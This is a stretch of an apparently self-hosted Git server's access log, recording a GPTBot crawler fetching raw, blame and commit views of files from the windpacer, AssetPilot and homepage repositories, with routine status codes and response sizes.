- 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10021] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:15:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20383] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:15:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 52] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" -[17/Feb/2026:15:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10930] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11750] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" -[17/Feb/2026:15:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10959] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 11054] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" -[17/Feb/2026:15:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 10092] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" -[17/Feb/2026:15:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12466] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile" -[17/Feb/2026:15:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 10895] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20377] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20375] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:19:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot" -[17/Feb/2026:15:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/" -[17/Feb/2026:15:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" -[17/Feb/2026:15:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10959] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" -[17/Feb/2026:15:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 10063] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" -[17/Feb/2026:15:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode/c_cpp_properties.json" -[17/Feb/2026:15:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 52] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" -[17/Feb/2026:15:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 9502] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:15:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 9925] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:15:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9934] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" [Client 74.7.227.38] [Length 10645739] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg" -[17/Feb/2026:15:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43162] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43159] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/main.py" -[17/Feb/2026:15:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2fstatus.json" [Client 74.7.227.38] [Length 17268] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:15:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.diff" [Client 74.7.227.38] [Length 115569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:15:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96.patch" [Client 74.7.227.38] [Length 207177] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:15:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11556] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" [Client 74.7.227.38] [Length 11521] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.3" [Client 74.7.227.38] [Length 56760] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:15:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log" [Client 74.7.227.38] [Length 42666] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.1" [Client 74.7.227.38] [Length 50335] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:15:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.6" [Client 74.7.227.38] [Length 52526] [Gzip 8.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:15:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fletsencrypt.log.7" [Client 74.7.227.38] [Length 21179] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:15:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2fnginx%2fproxy_host" [Client 74.7.227.38] [Length 35627] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" -[17/Feb/2026:15:20:11 +0000] - 200 200 - GET https 